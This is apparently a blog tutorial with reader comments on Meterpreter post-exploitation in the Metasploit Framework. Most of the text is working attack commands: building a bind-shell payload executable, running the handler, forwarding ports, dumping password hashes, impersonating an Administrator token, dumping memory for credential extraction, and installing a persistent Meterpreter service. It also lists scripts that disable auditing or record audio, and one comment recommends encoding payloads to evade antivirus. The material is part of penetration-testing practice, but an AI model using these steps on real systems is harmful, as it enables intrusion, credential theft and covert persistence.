Meterpreter, short for The Meta-Interpreter, is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex and advanced features that would otherwise be tedious to implement purely in assembly. The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared ob ject (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred. Meterpreter and all of the extensions that it loads are executed entirely from memory and never touch the disk, thus allowing them to execute under the radar of standard Anti-Virus detection.
First of all, i would like to remark that i use
Meterpreter as a standalone binary most of the times. To create a binary for uploading to a server you can use this command:
./msfpayload windows/meterpreter/bind_tcp LPORT=443 X > mymeterpreter.exe
Once uploaded the binary and executed (i leave this to you), you have to launch the multi_handler exploit to manage the connection to meterpreter, in this case:
./mscli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E
Or inside the metasploit console:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(handler)> set LPORT 443
msf exploit(handler)> exploit
Well once we have a working connection, these are some things that you can do:
-Port forwarding: You can make port redirections,
meterpreter> portfwd -a -L 127.0.0.1 -l 444 -h destiny -p 3389
-L = ip that will hold the listening port
-l = the listening port
-h = the target host
-p = the target port
Now you should connect to the exploited machine on port 444
More on forwarding and routing
here
-HashDumps:
You can get the hashes of the user accounts, like the pwdump utility, for later cracking.
meterpreter> use privs (we load the privileges module)
meterpreter> hashdump
You need Admin/System privileges to work.
-User impersonation, using the token passing technique:
You can use meterpreter for performing the "pass the token" attack to impersonate another user, introduced by Luke Jennings:
meterpreter> use incognito (we load the incognito module)
meterpreter> list_tokens (we list all available sessions)
meterpreter> impersonate_token oracle-en\\Administrator (we impersonate as the user oracle-en\\Administrator)
You need Admin/System privileges to work.
If you want to revert the situation an obtain your original session, you can execute:
meterpreter> rev2self
More on working with Incognito and Meterpreter at
Carnal0wnage
Dumping memory to extract hashes (using mdd.exe):
Here we first need to upload mdd.exe
(Mantech)
meterpreter> upload mdd.exe .
meterpreter> execute -f mdd.exe -a "-o mydump.dd"
meterpreter> download mydump.dd .
Now we need can use volatility to:
- cachedump Dump (decrypted) domain hashes from the registry
- hashdump Dump (decrypted) LM and NT hashes from the registry
- hivelist Print list of registry hives
- hivescan Scan for _CMHIVE objects (registry hives)
- lsadump Dump (decrypted) LSA secrets from the registry
More information on using meterpreter + mdd + volatility on
Attack Research blog
Another resource for Meterpreter plugins is the
DarkOperator website, where we can find some modules like:
- Disable_Audit: Disable auditing, by changing the local security policy
- GetGui: Script for enabling RDP service on target host.
- GetTelnet: this script will enable the Telnet Service on Win2003 and XP, and will install it on Vista and 2008.
- Memdump: Automation for mdd
- WinEnum: Script that will gather a big amount of information about the host
- Scheduleme: this will allow for task scheduling on target host. Will run the commands as System.
- NetEnum: Performs network enumeration, ping sweeps, reverse dns lookups, etc.
- Soundrecorder: Allows you to record sound on the target machine :)
- GetCounterMeasure: this script will identify antivirus,HIPS,HIDS, Firewalls, etc.
You can find examples of these modules and the source code in the the
Darkoperator website under the
meterpreter zone, many of them are included in the
Metasploit project.
Meterpreter service wrapper:
You can use Metsvc to run meterpreter as a Windows service, or as a command line application. You have to download from
Phreedom.org (Alexander Sotirov)
c:> metsvc.exe install-service (it will launch on port 31337)
Well that's all for now, i will like to thanks
Chris Gates and Carlos Perez (
DarkOperator) for their work with Meterpreter, a great tool for post exploitation and maybe a feature underestimated by many and unknown by others.
Also a big thanks for all the Metasploit team, for their great work.
Enjoy your post exploitation ...
-CMM
5 comentarios:
just a note that you can encode the meterpreter binaries to help subvert AV (using msfencode). see:
Metasploit Updates to MSFEncode - InDepthDefense.com
Yes Jcran, you are right, thanks for sharing :)
Just wanted to let you know that under your instructions for "HashDump" is should be 'use priv' instead of 'use privs'.
Hello!!
Can you explain me how to connect to the meterpreter service???
I install a meterpreter service in a computer test (WinXP) on vmware, but i can't connect!!!
Sorry for my bad english, and thanks!!!
some source of information on how to hack/extend meterpreter?
Post a Comment